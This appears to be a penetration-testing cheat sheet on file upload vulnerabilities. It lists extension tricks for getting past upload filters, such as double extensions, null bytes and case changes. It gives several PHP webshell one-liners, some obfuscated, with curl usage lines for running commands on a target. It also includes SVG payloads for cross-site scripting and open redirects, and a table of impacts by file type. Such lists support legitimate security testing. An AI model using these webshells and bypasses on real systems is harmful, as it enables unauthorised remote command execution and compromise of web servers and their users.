File-Upload
File extension
# extension blacklisted:
PHP: .phtm, phtml, .phps, .pht, .php2, .php3, .php4, .php5, .shtml, .phar, .pgif, .inc
ASP: .asp, .aspx, .cer, .asa
Jsp: .jsp, .jspx, .jsw, .jsv, .jspf
Coldfusion: .cfm, .cfml, .cfc, .dbm
Using random capitalization: .pHp, .pHP5, .PhAr
pht,phpt,phtml,php3,php4,php5,php6,php7,phar,pgif,phtm,phps,shtml,phar,pgif,inc
# extension whitelisted:
file.jpg.php
file.php.jpg
file.php.blah123jpg
file.php%00.jpg
file.php\\x00.jpg
file.php%00
file.php%20
file.php%0d%0a.jpg
file.php.....
file.php/
file.php.\\
file.
.html
Payloads
<?php system($_GET["cmd"]);?> # ?cmd= (ex: ?cmd=ls -la")
<?=`$_GET[0]`?> # ?0=command
<?=`$_POST[0]`?>
# Usage : curl -X POST http://target.com/path/to/shell.php -d "0=command"
<?=`{$_REQUEST['_']}`?>
# Usage: http://target.com/path/to/shell.php?_=command OR curl -X POST http://target.com/path/to/shell.php -d "_=command" '
<?=$_="";$_="'" ;$_=($_^chr(4*4*(5+5)-40)).($_^chr(47+ord(1==1))).($_^chr(ord('_')+3)).($_^chr(((10*10)+(5*3))));$_=${$_}['_'^'o'];echo`$_`?>
# Usage : http://target.com/path/to/shell.php?0=command
<?php $_="{"; $_=($_^"<").($_^">;").($_^"/"); ?><?=${'_'.$_}['_'](${'_'.$_}['__']);?>
# Usage : http://target.com/path/to/shell.php?_=function&__=argument http://target.com/path/to/shell.php?_=system&__=ls
Content type
- Preserve name, but change content-type
Content-Type: image/jpeg, image/gif, image/png
Content length
# Small bad code:
<?='$_GET[x]'?>
Impact by extension
asp, aspx, php5, php, php3: --> webshell, rce
svg: --> stored xss, ssrf, xxe
gif: --> stored xss, ssrf
csv: --> csv injection
xml: --> xxe
avi: --> lfi, ssrf
html, js: --> html injection, xss, open redirect
png, jpeg: --> pixel flood attack dos
zip: --> rce via lfi, dos
pdf, pptx: --> ssrf, blind xxe
File name
Other Test Cases
File Upload Exploitation
SVG file To XSS
<svg version="1.1" baseProfile="full" xmlns="http://www.w3.org/2000/svg"> <rect width="300" height="100" style="fill:rgb(0,0,255);stroke-width:3;stroke:rgb(0,0,0)" /> <script type="text/javascript"> alert("h0tak88r XSS"); </script> </svg>
Open Redirect when uploading svg files
<code> <?xml version="1.0" encoding="UTF-8" standalone="yes"?> <svg onload="window.location='<http://www.google.com>'" xmlns="<http://www.w3.org/2000/svg>"> </svg> </code>
Top Upload reports from HackerOne:
Last updated
Was this helpful?